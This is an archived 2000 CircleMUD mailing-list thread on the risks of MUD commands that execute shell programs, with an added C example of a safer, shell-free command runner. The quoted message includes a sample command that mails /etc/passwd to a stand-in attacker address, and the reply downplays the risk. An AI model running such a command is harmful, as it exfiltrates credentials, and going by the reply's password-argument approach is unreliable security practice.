Re: Ports

From: Shane Lee (mudmaster@Randor.zzn.com)
Date: 09/08/00


---- Begin Original Message ----

From: The Merciless Lord of Everything <serces@mud.dk>
Sent: Fri, 8 Sep 2000 12:25:30 +0200
To: CIRCLE@post.queensu.ca
Subject: Re: [CIRCLE] Ports

-snip-
While I'm on the ranting side :), a mud should imho not be able to
grab onto system files. I've seen muds offer "ps -axu" and return the
information to the user, even muds that offer the ability to execute
arbitrary commands on the server. Imagine the following in conjunction
with a mud that runs as root (and offers the above arbitrary)

Mr. Evilguy hacks the admin's passwords (grabs it or however Evilguys
get it :), and does a
"execute pwunconv && mail evilguy@foo.bar < /etc/passwd && pwconv"
Voila.. mr evilguy now has a complete listing of usernames and
passwords.

-snip-

/S




Sir Alec Guinness
 - May the force be with you, Always!

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Hrmm, I beg to differ with you here. I installed pgrun.c written by
Petr Vilim and have found it very useful. After contacting Petr, I
installed a "make" command that allows me to compile the MUD without
having to enter the shell. When you edit the source via save-to-ftp,
you find this more than a bit handy.
Security is not that hard, as long as you protect each command with a
final argument that contains a password. Of course, you want to check
the player's idnum first.
If a hacker is out to get you, there isn't much you can do. I refuse
to stay huddled up in a corner, cowering in fright while life passes
me by.

-FIRE
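
The two posts above disagree about how risky an in-game "execute" or "make" command is. The following is an added example, not part of either post and not code from pgrun.c or CircleMUD, of a narrower design that refuses to run anything when the MUD's effective uid is root and never hands typed text to a shell. All names, the idnum value and the paths are assumptions.

```c
#include <stddef.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

enum verdict { ALLOW, DENY_ROOT, DENY_IDNUM, DENY_UNKNOWN };

/* Fixed argv per command: nothing typed by a player reaches exec or a shell. */
static char *const make_argv[] = { "make", "-C", "../src", NULL }; /* assumed source dir */

struct admin_cmd { const char *name; const char *path; char *const *argv; };
static const struct admin_cmd allowed[] = {
    { "make", "/usr/bin/make", make_argv },   /* assumed location of make */
};

#define IMPL_IDNUM 1L   /* assumed idnum of the single implementor account */

/* Exact match on the whole input, so "make && mail ..." is not "make". */
static const struct admin_cmd *lookup_cmd(const char *input) {
    for (size_t i = 0; i < sizeof allowed / sizeof allowed[0]; i++)
        if (strcmp(input, allowed[i].name) == 0)
            return &allowed[i];
    return NULL;
}

/* Decide before anything is spawned; euid is a parameter so it can be tested. */
enum verdict check_request(long idnum, uid_t euid, const char *input) {
    if (euid == 0) return DENY_ROOT;            /* a MUD running as root runs nothing */
    if (idnum != IMPL_IDNUM) return DENY_IDNUM; /* idnum check comes before lookup */
    if (lookup_cmd(input) == NULL) return DENY_UNKNOWN;
    return ALLOW;
}

/* Run an allowed command without a shell; returns its exit status or -1. */
int run_request(long idnum, const char *input) {
    if (check_request(idnum, geteuid(), input) != ALLOW) return -1;
    const struct admin_cmd *c = lookup_cmd(input);
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execv(c->path, c->argv);   /* no /bin/sh, so "&&" and "<" have no meaning */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

With this shape, a stolen admin password only reaches the commands in the table, and the command line quoted in the first message is rejected as unknown.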




This archive was generated by hypermail 2b30 : 04/11/01 PDT